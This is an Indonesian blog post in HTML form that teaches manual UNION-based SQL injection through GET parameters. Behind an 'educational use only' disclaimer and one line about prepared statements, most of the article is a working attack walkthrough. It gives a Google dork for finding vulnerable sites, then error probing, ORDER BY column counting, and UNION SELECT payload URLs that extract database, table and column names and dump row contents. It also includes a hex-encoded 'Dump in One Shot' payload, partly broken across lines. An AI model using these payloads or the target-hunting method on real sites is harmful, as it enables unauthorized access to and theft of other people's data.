<!DOCTYPE html>
<html lang=id>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Disclaimer:Disclaimer ini disengaja ditempatkan di bagian atas agar dibaca terlebih dahulu. Tujuan dari pembelajaran berikut adalah untuk keperluan pembelajaran dan peningkatan keamanan pada website s">
<meta property="og:type" content="article">
<meta property="og:title" content="Union SQL Injection Manual Sederhana: Metode GET HTTP">
<meta property="og:url" content="https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/index.html">
<meta property="og:site_name" content="incrustwerush.org - Science, Social, Technology, and BrotherHood">
<meta property="og:description" content="Disclaimer:Disclaimer ini disengaja ditempatkan di bagian atas agar dibaca terlebih dahulu. Tujuan dari pembelajaran berikut adalah untuk keperluan pembelajaran dan peningkatan keamanan pada website s">
<meta property="og:locale" content="id_ID">
<meta property="article:published_time" content="2024-01-18T13:08:48.000Z">
<meta property="article:modified_time" content="2024-01-18T13:14:31.261Z">
<meta property="article:author" content="R&amp;D ICWR">
<meta property="article:tag" content="In Crust We Rush, Science, Social, Technology, BrotherHood">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="https://incrustwerush.org/img/site/icon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="https://incrustwerush.org/img/site/icon.ico" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="https://incrustwerush.org/img/site/icon.ico">
        
      
    
    <!-- title -->
    <title>Union SQL Injection Manual Sederhana: Metode GET HTTP</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/01/18/100-Perintah-Penting-untuk-Linux-Unix-Panduan-Pengguna-Baris-Perintah/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&text=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&title=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&is_video=false&description=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Union SQL Injection Manual Sederhana: Metode GET HTTP&body=Check out this article: https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&title=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&title=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&title=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&title=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&name=Union SQL Injection Manual Sederhana: Metode GET HTTP&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&t=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Disclaimer"><span class="toc-number">1.</span> <span class="toc-text">Disclaimer:</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Union SQL Injection Manual Sederhana: Metode GET HTTP
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">R&D ICWR</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-01-18T13:08:48.000Z" class="dt-published" itemprop="datePublished">2024-01-18</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h3 id="Disclaimer"><a href="#Disclaimer" class="headerlink" title="Disclaimer:"></a><strong>Disclaimer:</strong></h3><p>Disclaimer ini disengaja ditempatkan di bagian atas agar dibaca terlebih dahulu. Tujuan dari pembelajaran berikut adalah untuk keperluan pembelajaran dan peningkatan keamanan pada website saja. Tutorial ini tidak dimaksudkan untuk digunakan dalam aktivitas ilegal seperti dumping database. Jika ada pihak yang menggunakan tutorial ini untuk aktivitas ilegal, hal tersebut bukanlah tanggung jawab kami.</p>
<hr>
<p>SQL injection merupakan teknik serangan keamanan yang memanfaatkan celah pada sistem pengolahan query SQL pada aplikasi web. Pada serangan ini, penyerang menginjeksikan perintah SQL berbahaya ke dalam input aplikasi. Jika aplikasi tidak melakukan validasi atau penyaringan input dengan benar, perintah SQL tersebut dapat dieksekusi oleh database. Salah satu bentuk umum serangan SQL injection terjadi melalui metode GET dalam protokol HTTP, di mana parameter URL dapat dimanipulasi untuk menyisipkan perintah SQL yang membahayakan integritas data atau memungkinkan akses yang tidak sah.</p>
<p>Sebagai contoh, URL yang rentan terhadap SQL injection pada metode GET adalah seperti: <code>http://contoh.com/login.php?username=admin&#39; OR &#39;1&#39;=&#39;1&#39; -- &amp;password=abc</code>. Dalam contoh ini, penyerang mencoba menyisipkan perintah SQL yang selalu benar, sehingga mengakibatkan akses ke seluruh data dari tabel yang bersangkutan. Untuk menjaga keamanan aplikasi dari serangan SQL injection, sangat penting untuk memvalidasi dan membersihkan input, serta menggunakan teknik parameterized queries atau prepared statements dalam pengolahan query SQL. Pengujian keamanan secara berkala juga diperlukan untuk memastikan tingkat keamanan aplikasi tetap terjaga.</p>
<hr>
<p>Proses pencarian target website yang menggunakan parameter GET untuk menampilkan data dapat dilakukan dengan menggunakan query dork Google, contohnya dengan <code>inurl:&quot;*.php?id=&quot;</code>. Setelah menemukan website target, seperti <code>http://contoh.com/get_name?id=1</code>, pengeksploitasian webnya dimulai dengan menambahkan karakter <code>&#39;</code> atau <code>&quot;</code> pada bagian paling belakang URL, misalnya: <code>http://contoh.com/get_name?id=1&#39;</code> atau <code>http://contoh.com/get_name?id=1&quot;</code>. Jika muncul error pada website, seperti <code>Warning: mysqli_num_rows() expects</code> dan sejenisnya, dapat disimpulkan bahwa website tersebut rentan terhadap SQL injection.</p>
<p>Setelah mengidentifikasi website yang vulner, penyerang dapat menambahkan karakter balancing seperti <code>--</code> (untuk MySQL Linux Style), <code>--+</code> (untuk MySQL Windows Style), <code>#</code> (hash URL Encode while Use), <code>--+-</code> (SQL Comment), <code>;%00</code> (Null Byte), atau <code>/backtick</code> (backtick) untuk memperoleh respons yang diinginkan. Proses selanjutnya melibatkan penyuntikan query untuk mengetahui jumlah kolom pada table database, contohnya:</p>
<ul>
<li><code>http://contoh.com/get_name?id=1&#39; order by 1--+-</code> -&gt; Tidak ada error</li>
<li><code>http://contoh.com/get_name?id=1&#39; order by 2--+-</code> -&gt; Tidak ada error</li>
<li><code>http://contoh.com/get_name?id=1&#39; order by 3--+-</code> -&gt; Tidak ada error</li>
<li><code>http://contoh.com/get_name?id=1&#39; order by 4--+-</code> -&gt; Terjadi error, menandakan jumlah kolom pada table database adalah 3</li>
</ul>
<p>Selanjutnya, penyerang menggunakan query untuk menampilkan posisi kolom pada table database, contohnya:</p>
<ul>
<li><code>http://contoh.com/get_name?id=1&#39; union select 1,2,3--+-</code></li>
</ul>
<p>Website akan menampilkan angka 1, 2, dan 3 sesuai posisi kolom dalam table database, yang nantinya akan digunakan untuk menampilkan output hasil eksekusi query. Setelah mengetahui posisi yang diinginkan, penyerang bisa mengeksekusi query yang diinginkan pada posisi tersebut, misalnya menampilkan nama database dengan query:</p>
<ul>
<li><code>http://contoh.com/get_name?id=-1&#39; union select 1,database(),3--+-</code></li>
</ul>
<p>Query untuk menampilkan table pada database adalah sebagai berikut:</p>
<ul>
<li><code>http://contoh.com/get_name?id=-1&#39; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+-</code></li>
</ul>
<p>Setelah mendapatkan nama-nama table pada database, langkah selanjutnya adalah menampilkan isi kolom pada table tersebut. Dengan menggunakan query berikut, nama table diubah menjadi bentuk hexa yang diawali dengan <code>0x</code>:</p>
<ul>
<li><code>http://contoh.com/get_name?id=-1&#39; union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x6e616d615f746162656c --+-</code></li>
</ul>
<p>Atau menggunakan metode Dump in One Shot SQL Injection:</p>
<ul>
<li>&#96;<a target="_blank" rel="noopener" href="http://contoh.com/get_name?id=-1">http://contoh.com/get_name?id=-1</a>‘ union select 1,concat(0x3c623e44756d7020696e204f6e652053686f743c2f623e3c62723e,version(),0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,@c:&#x3D;0x00,if((select count(*) from information_schema.columns where table_schema not like 0x696e666f726d6174696f6e</li>
</ul>
<p>5f736368656d61 and @c:&#x3D;concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c),3–+-&#96;</p>
<p>Setelah mendapatkan nama kolom dari tabel, proses terakhir adalah menampilkan isi dari kolom pada table database. Misalnya, jika nama kolom ada 3 yaitu id, judul, detail, query untuk menampilkan isi dari kolom-kolom tersebut adalah:</p>
<ul>
<li><code>http://contoh.com/get_name?id=-1&#39; union select 1,group_concat(id,judul,detail),3 from nama_tabel --+-</code></li>
</ul>
<p>Dengan langkah-langkah tersebut, penyerang dapat berhasil mengeksploitasi dan mendapatkan akses tidak sah ke dalam database suatu aplikasi.</p>
<p>Penulis: Afrizal F.A</p>
<hr>
<p><em>Referensi:</em></p>
<ul>
<li><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/sql-injection/union-attacks">https://portswigger.net/web-security/sql-injection/union-attacks</a></li>
<li><a target="_blank" rel="noopener" href="https://exploit.linuxsec.org/tutorial-sql-injection-manual/">https://exploit.linuxsec.org/tutorial-sql-injection-manual/</a></li>
<li><a target="_blank" rel="noopener" href="https://exploit.linuxsec.org/payload-dump-one-shot-sql-injection/">https://exploit.linuxsec.org/payload-dump-one-shot-sql-injection/</a></li>
<li><a target="_blank" rel="noopener" href="https://www.securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-1.html">https://www.securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-1.html</a></li>
</ul>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Disclaimer"><span class="toc-number">1.</span> <span class="toc-text">Disclaimer:</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&text=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&title=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&is_video=false&description=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Union SQL Injection Manual Sederhana: Metode GET HTTP&body=Check out this article: https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&title=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&title=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&title=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&title=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&name=Union SQL Injection Manual Sederhana: Metode GET HTTP&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.incrustwerush.org/2024/01/18/Union-SQL-Injection-Manual-Sederhana-Metode-GET-HTTP/&t=Union SQL Injection Manual Sederhana: Metode GET HTTP"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    R&amp;D ICWR
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
